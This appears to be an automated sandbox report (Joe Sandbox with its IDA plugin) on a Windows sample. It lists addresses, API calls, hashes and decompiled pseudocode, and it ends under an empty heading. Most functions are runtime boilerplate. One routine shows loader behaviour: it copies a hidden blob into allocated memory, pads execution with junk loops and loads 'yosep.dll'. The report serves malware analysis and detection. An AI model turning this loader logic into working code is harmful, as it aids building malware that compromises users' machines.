                                                            0x004030ae
                                                            0x004030b9
                                                            0x004030c1
                                                            0x004030c9
                                                            0x004030d4
                                                            0x004030f2
                                                            0x004030fd
                                                            0x00403118
                                                            0x00403123
                                                            0x00403138
                                                            0x00403160
                                                            0x0040316b
                                                            0x00403176
                                                            0x0040319b
                                                            0x004031a6
                                                            0x004031ae
                                                            0x004031b9
                                                            0x004031db
                                                            0x004031e3
                                                            0x004031ee
                                                            0x004031f9
                                                            0x00403201
                                                            0x00403219
                                                            0x00403221
                                                            0x00403229
                                                            0x0040323e
                                                            0x00403282
                                                            0x0040329d
                                                            0x004032b8
                                                            0x004032c3
                                                            0x004032cb
                                                            0x004032d6
                                                            0x004032de
                                                            0x00403306
                                                            0x0040330e
                                                            0x00403316
                                                            0x00403321
                                                            0x0040332c
                                                            0x00403337
                                                            0x00403372
                                                            0x00403390
                                                            0x0040339b
                                                            0x004033a6
                                                            0x004033c4
                                                            0x004033cf
                                                            0x004033da
                                                            0x004033e2
                                                            0x00403400
                                                            0x0040340b
                                                            0x00403416
                                                            0x0040341e
                                                            0x00403429
                                                            0x00403434
                                                            0x0040344f
                                                            0x00403467
                                                            0x0040346f
                                                            0x0040348a
                                                            0x00403495
                                                            0x004034a0
                                                            0x004034a8
                                                            0x004034c0
                                                            0x00403511
                                                            0x0040354f
                                                            0x0040357a
                                                            0x004035a5
                                                            0x004035b0
                                                            0x004035bb
                                                            0x004035c3
                                                            0x004035ce
                                                            0x004035d9
                                                            0x004035e4
                                                            0x00403615
                                                            0x0040361d
                                                            0x00403628
                                                            0x00403630
                                                            0x0040363b
                                                            0x0040366d
                                                            0x00403678
                                                            0x00403680
                                                            0x0040368b
                                                            0x00403693
                                                            0x0040369b
                                                            0x004036b9
                                                            0x004036c4
                                                            0x004036cf
                                                            0x004036ed
                                                            0x004036f8
                                                            0x00403716
                                                            0x00403721
                                                            0x00403729
                                                            0x00403744
                                                            0x0040374c
                                                            0x0040376a
                                                            0x0040377f
                                                            0x0040378a
                                                            0x00403792
                                                            0x0040379a
                                                            0x004037a5
                                                            0x004037ad
                                                            0x004037d5
                                                            0x0040380d
                                                            0x00403818
                                                            0x00403823
                                                            0x0040382e
                                                            0x00403839
                                                            0x00403877
                                                            0x004038c5
                                                            0x004038dd
                                                            0x004038e8
                                                            0x004038e8
                                                            0x004038f9
                                                            0x00000000
                                                            0x00000000
                                                            0x004038fb
                                                            0x00403902
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403902
                                                            0x0040390d
                                                            0x00403917
                                                            0x0040391c
                                                            0x0040392b

                                                            APIs
                                                            • WindowFromDC.USER32(00000000), ref: 00402AF0
                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00402AF7
                                                            • GetNumberOfConsoleMouseButtons.KERNEL32(00000000), ref: 00402AFE
                                                            • ResetEvent.KERNEL32(00000000), ref: 00402B05
                                                            • EndUpdateResourceW.KERNEL32(00000000,00000000), ref: 00402B0D
                                                            • GetComputerNameW.KERNEL32 ref: 00402B15
                                                            • _calloc.LIBCMT ref: 00402B1D
                                                              • Part of subcall function 00403954: __calloc_impl.LIBCMT ref: 00403969
                                                            • _calloc.LIBCMT ref: 00402B24
                                                            • SetCommMask.KERNELBASE(00000000,00000000), ref: 00402B3D
                                                            • SetLastError.KERNEL32(00000000), ref: 00402B44
                                                            • GetConsoleAliasW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00402B4E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_1E3.jbxd
                                                            Similarity
                                                            • API ID: Console_calloc$AliasButtonsCommComputerEnvironmentErrorEventFreeFromLastMaskMouseNameNumberResetResourceStringsUpdateWindow__calloc_impl
                                                            • String ID: "d=$#h-$%$6$4PJN$5F7$<=Tl$<4X$@`Fm$B;$C[Ie$Ej^$IBu7$K5$R\4T$T+Zx$`I4S$`Y7@$cb6E$ciH$e"3*$eW9$$eXYh$g#o*$jip5$p1Mm$ua%
                                                            • API String ID: 3970707773-1174297621
                                                            • Opcode ID: c1450f12cbcde2ba815a9ae6640dce5531c23eee11ec049179237c7e2cdc89f9
                                                            • Instruction ID: 366320939e209ee0b1a7947af6c80efbf811adb7fd4a1cf77077aecc4ceb2376
                                                            • Opcode Fuzzy Hash: c1450f12cbcde2ba815a9ae6640dce5531c23eee11ec049179237c7e2cdc89f9
                                                            • Instruction Fuzzy Hash: D662EAB9609380CBC2B48F6AC58978EF7E4BF99314F508D0CE5DA9A620C7709985CF57
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 16 40714f-40715e GetEnvironmentStringsW 17 407160-407163 16->17 18 407164-407167 16->18 19 407177-407180 call 4080c9 18->19 20 407169-40716e 18->20 23 407185-40718a 19->23 20->20 21 407170-407175 20->21 21->19 21->20 24 407199-4071a4 call 40a030 23->24 25 40718c-407198 FreeEnvironmentStringsW 23->25 24->25
                                                            C-Code - Quality: 100%
                                                            			E0040714F() {
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				WCHAR* _t1;
                                                            				void* _t5;
                                                            				void* _t18;
                                                            				WCHAR* _t20;
                                                            
                                                            				_t1 = GetEnvironmentStringsW();
                                                            				_t20 = _t1;
                                                            				if(_t20 != 0) {
                                                            					if( *_t20 != 0) {
                                                            						goto L3;
                                                            						do {
                                                            							do {
                                                            								L3:
                                                            								_t1 =  &(_t1[1]);
                                                            							} while ( *_t1 != 0);
                                                            							_t1 =  &(_t1[1]);
                                                            						} while ( *_t1 != 0);
                                                            					}
                                                            					_t13 = _t1 - _t20 + 2;
                                                            					_t5 = E004080C9(_t1 - _t20 + 2); // executed
                                                            					_t18 = _t5;
                                                            					if(_t18 != 0) {
                                                            						E0040A030(_t13, _t18, _t20, _t18, _t20, _t13);
                                                            					}
                                                            					FreeEnvironmentStringsW(_t20);
                                                            					return _t18;
                                                            				} else {
                                                            					return 0;
                                                            				}
                                                            			}










                                                            0x00407152
                                                            0x00407158
                                                            0x0040715e
                                                            0x00407167
                                                            0x00000000
                                                            0x00407169
                                                            0x00407169
                                                            0x00407169
                                                            0x0040716a
                                                            0x0040716b
                                                            0x00407171
                                                            0x00407172
                                                            0x00407169
                                                            0x0040717c
                                                            0x00407180
                                                            0x00407185
                                                            0x0040718a
                                                            0x0040719c
                                                            0x004071a1
                                                            0x0040718d
                                                            0x00407198
                                                            0x00407160
                                                            0x00407163
                                                            0x00407163

                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32(00000000,00403F3A), ref: 00407152
                                                            • __malloc_crt.LIBCMT ref: 00407180
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040718D
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_1E3.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentStrings$Free__malloc_crt
                                                            • String ID:
                                                            • API String ID: 237123855-0
                                                            • Opcode ID: 8fabccca1e6171ddc240eda1d034c06755ba580f82cf259f9fe05248f73ea12e
                                                            • Instruction ID: 3864f1fbe5c903a96f437bc9bd3a71b249565b48777c964063066275c13dfad6
                                                            • Opcode Fuzzy Hash: 8fabccca1e6171ddc240eda1d034c06755ba580f82cf259f9fe05248f73ea12e
                                                            • Instruction Fuzzy Hash: 97F0E23B9191616ADA203B357C488771668DAC6329312443BF896E73C0F9385D8382AA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 28 407400-407422 HeapCreate 29 407424-407425 28->29 30 407426-40742f 28->30
                                                            C-Code - Quality: 100%
                                                            			E00407400(intOrPtr _a4) {
                                                            				void* _t6;
                                                            
                                                            				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                            				 *0x4781d4 = _t6;
                                                            				if(_t6 != 0) {
                                                            					 *0x479930 = 1;
                                                            					return 1;
                                                            				} else {
                                                            					return _t6;
                                                            				}
                                                            			}




                                                            0x00407415
                                                            0x0040741b
                                                            0x00407422
                                                            0x00407429
                                                            0x0040742f
                                                            0x00407425
                                                            0x00407425
                                                            0x00407425

                                                            APIs
                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00407415
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_1E3.jbxd
                                                            Similarity
                                                            • API ID: CreateHeap
                                                            • String ID:
                                                            • API String ID: 10892065-0
                                                            • Opcode ID: 19e61f63fe2f75a2d166a63ff340277e33a9eaffe2633fe00331c4b57e2baeab
                                                            • Instruction ID: 7830314477c359c329c9d4a462b38d35abe9eb27a05c43c7fd05095a650af302
                                                            • Opcode Fuzzy Hash: 19e61f63fe2f75a2d166a63ff340277e33a9eaffe2633fe00331c4b57e2baeab
                                                            • Instruction Fuzzy Hash: 19D05E729943445AEB105FB1AD08B623BDCD384395F00843ABA0DC66A0E674D991C608
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 31 40619b-40619d call 406129 33 4061a2-4061a3 31->33
                                                            C-Code - Quality: 100%
                                                            			E0040619B() {
                                                            				void* _t1;
                                                            
                                                            				_t1 = E00406129(0); // executed
                                                            				return _t1;
                                                            			}




                                                            0x0040619d
                                                            0x004061a3

                                                            APIs
                                                            • __encode_pointer.LIBCMT ref: 0040619D
                                                              • Part of subcall function 00406129: TlsGetValue.KERNEL32(00000000,?,004061A2,00000000,0040A3A5,00477B30,00000000,00000314), ref: 0040613B
                                                              • Part of subcall function 00406129: TlsGetValue.KERNEL32(00000004,?,004061A2,00000000,0040A3A5,00477B30,00000000,00000314), ref: 00406152
                                                              • Part of subcall function 00406129: RtlEncodePointer.NTDLL(?,?,004061A2,00000000,0040A3A5,00477B30,00000000,00000314), ref: 00406190
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_1E3.jbxd
                                                            Similarity
                                                            • API ID: Value$EncodePointer__encode_pointer
                                                            • String ID:
                                                            • API String ID: 2585649348-0
                                                            • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                            • Instruction ID: e87044ab682afd9b7b1670cd61dbbbfcd87b06b4ecde40ab423a09c9dfcd5251
                                                            • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                            • Instruction Fuzzy Hash:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 85%
                                                            			E00405EC0(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                            				intOrPtr _v0;
                                                            				void* _v804;
                                                            				intOrPtr _v808;
                                                            				intOrPtr _v812;
                                                            				intOrPtr _t6;
                                                            				intOrPtr _t12;
                                                            				intOrPtr _t13;
                                                            				long _t17;
                                                            				intOrPtr _t21;
                                                            				intOrPtr _t22;
                                                            				intOrPtr _t25;
                                                            				intOrPtr _t26;
                                                            				intOrPtr _t27;
                                                            				intOrPtr* _t31;
                                                            				void* _t34;
                                                            
                                                            				_t27 = __esi;
                                                            				_t26 = __edi;
                                                            				_t25 = __edx;
                                                            				_t22 = __ecx;
                                                            				_t21 = __ebx;
                                                            				_t6 = __eax;
                                                            				_t34 = _t22 -  *0x4116f8; // 0x75bc5e32
                                                            				if(_t34 == 0) {
                                                            					asm("repe ret");
                                                            				}
                                                            				 *0x478348 = _t6;
                                                            				 *0x478344 = _t22;
                                                            				 *0x478340 = _t25;
                                                            				 *0x47833c = _t21;
                                                            				 *0x478338 = _t27;
                                                            				 *0x478334 = _t26;
                                                            				 *0x478360 = ss;
                                                            				 *0x478354 = cs;
                                                            				 *0x478330 = ds;
                                                            				 *0x47832c = es;
                                                            				 *0x478328 = fs;
                                                            				 *0x478324 = gs;
                                                            				asm("pushfd");
                                                            				_pop( *0x478358);
                                                            				 *0x47834c =  *_t31;
                                                            				 *0x478350 = _v0;
                                                            				 *0x47835c =  &_a4;
                                                            				 *0x478298 = 0x10001;
                                                            				 *0x47824c =  *0x478350;
                                                            				 *0x478240 = 0xc0000409;
                                                            				 *0x478244 = 1;
                                                            				_t12 =  *0x4116f8; // 0x75bc5e32
                                                            				_v812 = _t12;
                                                            				_t13 =  *0x4116fc; // 0x8a43a1cd
                                                            				_v808 = _t13;
                                                            				 *0x478290 = IsDebuggerPresent();
                                                            				_push(1);
                                                            				E004091B5(_t14);
                                                            				SetUnhandledExceptionFilter(0);
                                                            				_t17 = UnhandledExceptionFilter(0x401a98);
                                                            				if( *0x478290 == 0) {
                                                            					_push(1);
                                                            					E004091B5(_t17);
                                                            				}
                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                            			}


















                                                            0x00405ec0
                                                            0x00405ec0
                                                            0x00405ec0
                                                            0x00405ec0
                                                            0x00405ec0
                                                            0x00405ec0
                                                            0x00405ec0
                                                            0x00405ec6
                                                            0x00405ec8
                                                            0x00405ec8
                                                            0x0040a6e5
                                                            0x0040a6ea
                                                            0x0040a6f0
                                                            0x0040a6f6
                                                            0x0040a6fc
                                                            0x0040a702
                                                            0x0040a708
                                                            0x0040a70f
                                                            0x0040a716
                                                            0x0040a71d
                                                            0x0040a724
                                                            0x0040a72b
                                                            0x0040a732
                                                            0x0040a733
                                                            0x0040a73c
                                                            0x0040a744
                                                            0x0040a74c
                                                            0x0040a757
                                                            0x0040a766
                                                            0x0040a76b
                                                            0x0040a775
                                                            0x0040a77f
                                                            0x0040a784
                                                            0x0040a78a
                                                            0x0040a78f
                                                            0x0040a79b
                                                            0x0040a7a0
                                                            0x0040a7a2
                                                            0x0040a7aa
                                                            0x0040a7b5
                                                            0x0040a7c2
                                                            0x0040a7c4
                                                            0x0040a7c6
                                                            0x0040a7cb
                                                            0x0040a7df

                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32 ref: 0040A795
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A7AA
                                                            • UnhandledExceptionFilter.KERNEL32(00401A98), ref: 0040A7B5
                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0040A7D1
                                                            • TerminateProcess.KERNEL32(00000000), ref: 0040A7D8
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_1E3.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                            • String ID:
                                                            • API String ID: 2579439406-0
                                                            • Opcode ID: b1c45dec5dc76a2f7711566ddacc07ae3a58d3990441d9bfa468130bae3f9e39
                                                            • Instruction ID: e78aba716c159d7bb806c340f08f852017787b479a2d51dfdac945b03bb9496c
                                                            • Opcode Fuzzy Hash: b1c45dec5dc76a2f7711566ddacc07ae3a58d3990441d9bfa468130bae3f9e39
                                                            • Instruction Fuzzy Hash: D921EDB49813048BD350DF68E9496643BA4FB08B15F14407EEA0CA7671EB7658C18F5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 250 40297f-402994 251 402996-4029a9 call 403b0a call 403ae9 call 403dc0 250->251 252 4029ae-4029f8 GetModuleHandleA GetProcAddress call 4028be 250->252 251->252 261 402a15 252->261 262 4029fa-402a13 252->262 263 402a17-402a1d 261->263 262->261 262->262 264 402a40-402a47 263->264 265 402a1f-402a3a GetCurrentThreadId VirtualAlloc ReadConsoleA 263->265 264->263 266 402a49-402a4e call 402834 264->266 265->264 269 402a50-402a56 266->269 270 402a58 call 4028a4 269->270 271 402a5d-402a64 269->271 270->271 271->269 273 402a66-402a69 271->273 274 402a6a-402a71 273->274 275 402a90-402a91 274->275 276 402a73-402a8a SetConsoleDisplayMode LockResource 274->276 275->274 277 402a93-402a98 275->277 276->275 278 402a99-402aa3 277->278 279 402ac5-402ac6 278->279 280 402aa5-402abf GetComputerNameW SetThreadExecutionState TlsSetValue 278->280 279->278 281 402ac8-402adb LoadLibraryW call 402973 279->281 280->279
                                                            C-Code - Quality: 77%
                                                            			E0040297F(void* __ecx) {
                                                            				void* _v6;
                                                            				long _v8;
                                                            				short _v2056;
                                                            				struct HINSTANCE__* _t10;
                                                            				_Unknown_base(*)()* _t11;
                                                            				void* _t14;
                                                            				struct HINSTANCE__* _t25;
                                                            				void* _t33;
                                                            				void* _t35;
                                                            				intOrPtr _t36;
                                                            				void* _t37;
                                                            				void* _t40;
                                                            				void* _t42;
                                                            
                                                            				_t35 = __ecx;
                                                            				if( *0x479904 == 0x412) {
                                                            					E00403B0A(0);
                                                            					E00403AE9(0, 0);
                                                            					E00403DC0(0);
                                                            				}
                                                            				 *0x479904 =  *0x479904 + 0xb2d3b;
                                                            				_t10 = GetModuleHandleA("kernel32.dll");
                                                            				 *0x479758 = _t10;
                                                            				_t11 = GetProcAddress(_t10, "LocalAlloc");
                                                            				 *0x4796cc = _t11;
                                                            				 *0x4796c8 =  *_t11(0,  *0x479904);
                                                            				E004028BE(_t35);
                                                            				_t36 =  *0x479904;
                                                            				_t14 = 0;
                                                            				if(_t36 > 0) {
                                                            					do {
                                                            						 *((char*)( *0x4796c8 + _t14)) =  *((intOrPtr*)( *0x479908 + _t14 + 0xb2d3b));
                                                            						_t14 = _t14 + 1;
                                                            					} while (_t14 < _t36);
                                                            				}
                                                            				_t40 = 0;
                                                            				do {
                                                            					if(_t36 + _t40 == 0x5e) {
                                                            						GetCurrentThreadId();
                                                            						VirtualAlloc(0, 0, 0, 0);
                                                            						ReadConsoleA(0, 0, 0, 0, 0);
                                                            						_t36 =  *0x479904;
                                                            					}
                                                            					_t40 = _t40 + 1;
                                                            				} while (_t40 < 0x40c893);
                                                            				E00402834();
                                                            				_t37 = 0;
                                                            				do {
                                                            					if(_t37 == 0x770e) {
                                                            						E004028A4(_t37);
                                                            					}
                                                            					_t37 = _t37 + 1;
                                                            				} while (_t37 < 0x286b97d);
                                                            				_t33 = 0x7b;
                                                            				do {
                                                            					if( *0x479904 == 0xf) {
                                                            						_v8 = 0;
                                                            						asm("stosw");
                                                            						_push( &_v8);
                                                            						_push(0);
                                                            						_push(0);
                                                            						L0040392E();
                                                            						LockResource(0);
                                                            					}
                                                            					_t33 = _t33 - 1;
                                                            				} while (_t33 != 0);
                                                            				_t42 = 0x184cc;
                                                            				do {
                                                            					if( *0x479904 == 0x1833b) {
                                                            						GetComputerNameW( &_v2056,  &_v8);
                                                            						__imp__SetThreadExecutionState(0);
                                                            						TlsSetValue(0, 0);
                                                            					}
                                                            					_t42 = _t42 - 1;
                                                            				} while (_t42 != 0);
                                                            				_t25 = LoadLibraryW(L"yosep.dll");
                                                            				E00402973();
                                                            				return _t25;
                                                            			}
















                                                            0x0040297f
                                                            0x00402994
                                                            0x00402999
                                                            0x004029a0
                                                            0x004029a9
                                                            0x004029a9
                                                            0x004029ae
                                                            0x004029bd
                                                            0x004029c9
                                                            0x004029ce
                                                            0x004029dd
                                                            0x004029e4
                                                            0x004029e9
                                                            0x004029ee
                                                            0x004029f4
                                                            0x004029f8
                                                            0x004029fa
                                                            0x00402a0d
                                                            0x00402a10
                                                            0x00402a11
                                                            0x004029fa
                                                            0x00402a15
                                                            0x00402a17
                                                            0x00402a1d
                                                            0x00402a1f
                                                            0x00402a29
                                                            0x00402a34
                                                            0x00402a3a
                                                            0x00402a3a
                                                            0x00402a40
                                                            0x00402a41
                                                            0x00402a49
                                                            0x00402a4e
                                                            0x00402a50
                                                            0x00402a56
                                                            0x00402a58
                                                            0x00402a58
                                                            0x00402a5d
                                                            0x00402a5e
                                                            0x00402a69
                                                            0x00402a6a
                                                            0x00402a71
                                                            0x00402a75
                                                            0x00402a7c
                                                            0x00402a81
                                                            0x00402a82
                                                            0x00402a83
                                                            0x00402a84
                                                            0x00402a8a
                                                            0x00402a8a
                                                            0x00402a90
                                                            0x00402a90
                                                            0x00402a93
                                                            0x00402a99
                                                            0x00402aa3
                                                            0x00402ab0
                                                            0x00402ab7
                                                            0x00402abf
                                                            0x00402abf
                                                            0x00402ac5
                                                            0x00402ac5
                                                            0x00402acd
                                                            0x00402ad3
                                                            0x00402adb

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004029BD
                                                            • GetProcAddress.KERNEL32(00000000,LocalAlloc), ref: 004029CE
                                                            • GetCurrentThreadId.KERNEL32 ref: 00402A1F
                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000), ref: 00402A29
                                                            • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00402A34
                                                            • SetConsoleDisplayMode.KERNEL32(00000000,00000000,?), ref: 00402A84
                                                            • LockResource.KERNEL32(00000000,00000000,00000000,?), ref: 00402A8A
                                                            • GetComputerNameW.KERNEL32 ref: 00402AB0
                                                            • SetThreadExecutionState.KERNEL32 ref: 00402AB7
                                                            • TlsSetValue.KERNEL32(00000000,00000000), ref: 00402ABF
                                                            • LoadLibraryW.KERNEL32(yosep.dll), ref: 00402ACD
                                                              • Part of subcall function 00403B0A: __wcstoi64.LIBCMT ref: 00403B16
                                                              • Part of subcall function 00403DC0: _doexit.LIBCMT ref: 00403DCC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_1E3.jbxd
                                                            Similarity
                                                            • API ID: ConsoleThread$AddressAllocComputerCurrentDisplayExecutionHandleLibraryLoadLockModeModuleNameProcReadResourceStateValueVirtual__wcstoi64_doexit
                                                            • String ID: LocalAlloc$kernel32.dll$yosep.dll
                                                            • API String ID: 1649761710-3699620503
                                                            • Opcode ID: 53d9cc72a4315a1d6753bead965aef412282e3ae9e73b73b9b74afe0ddc2f886
                                                            • Instruction ID: 7e296469edf81c510a001de488f7b4e86d12bb8e6c09a60258ccd1e5f65f88a3
                                                            • Opcode Fuzzy Hash: 53d9cc72a4315a1d6753bead965aef412282e3ae9e73b73b9b74afe0ddc2f886
                                                            • Instruction Fuzzy Hash: EC3126B5902125BBC721AB61AF4C9DF3B68EF45314710443AF109F22E1DBBC5A85CBAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 92%
                                                            			E00406290(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                            				struct HINSTANCE__* _t23;
                                                            				intOrPtr _t28;
                                                            				intOrPtr _t32;
                                                            				void* _t40;
                                                            				intOrPtr _t46;
                                                            				void* _t47;
                                                            
                                                            				_t35 = __ebx;
                                                            				_push(0xc);
                                                            				_push(0x40fe60);
                                                            				E0040487C(__ebx, __edi, __esi);
                                                            				_t45 = L"KERNEL32.DLL";
                                                            				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                                                            				if(_t23 == 0) {
                                                            					_t23 = E00403B20(_t45);
                                                            				}
                                                            				 *(_t47 - 0x1c) = _t23;
                                                            				_t46 =  *((intOrPtr*)(_t47 + 8));
                                                            				 *((intOrPtr*)(_t46 + 0x5c)) = 0x401868;
                                                            				 *((intOrPtr*)(_t46 + 0x14)) = 1;
                                                            				if(_t23 != 0) {
                                                            					_t35 = GetProcAddress;
                                                            					 *((intOrPtr*)(_t46 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                                                            					 *((intOrPtr*)(_t46 + 0x1fc)) = GetProcAddress( *(_t47 - 0x1c), "DecodePointer");
                                                            				}
                                                            				 *((intOrPtr*)(_t46 + 0x70)) = 1;
                                                            				 *((char*)(_t46 + 0xc8)) = 0x43;
                                                            				 *((char*)(_t46 + 0x14b)) = 0x43;
                                                            				 *(_t46 + 0x68) = 0x4118a8;
                                                            				E00406842(_t35, _t40, 1, 0xd);
                                                            				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
                                                            				InterlockedIncrement( *(_t46 + 0x68));
                                                            				 *(_t47 - 4) = 0xfffffffe;
                                                            				E00406365();
                                                            				E00406842(_t35, _t40, 1, 0xc);
                                                            				 *(_t47 - 4) = 1;
                                                            				_t28 =  *((intOrPtr*)(_t47 + 0xc));
                                                            				 *((intOrPtr*)(_t46 + 0x6c)) = _t28;
                                                            				if(_t28 == 0) {
                                                            					_t32 =  *0x411eb0; // 0x411dd8
                                                            					 *((intOrPtr*)(_t46 + 0x6c)) = _t32;
                                                            				}
                                                            				E00408D2A( *((intOrPtr*)(_t46 + 0x6c)));
                                                            				 *(_t47 - 4) = 0xfffffffe;
                                                            				return E004048C1(E0040636E());
                                                            			}









                                                            0x00406290
                                                            0x00406290
                                                            0x00406292
                                                            0x00406297
                                                            0x0040629c
                                                            0x004062a2
                                                            0x004062aa
                                                            0x004062ad
                                                            0x004062b2
                                                            0x004062b3
                                                            0x004062b6
                                                            0x004062b9
                                                            0x004062c3
                                                            0x004062c8
                                                            0x004062d0
                                                            0x004062d8
                                                            0x004062e8
                                                            0x004062e8
                                                            0x004062ee
                                                            0x004062f1
                                                            0x004062f8
                                                            0x004062ff
                                                            0x00406308
                                                            0x0040630e
                                                            0x00406315
                                                            0x0040631b
                                                            0x00406322
                                                            0x00406329
                                                            0x0040632f
                                                            0x00406332
                                                            0x00406335
                                                            0x0040633a
                                                            0x0040633c
                                                            0x00406341
                                                            0x00406341
                                                            0x00406347
                                                            0x0040634d
                                                            0x0040635e

                                                            APIs
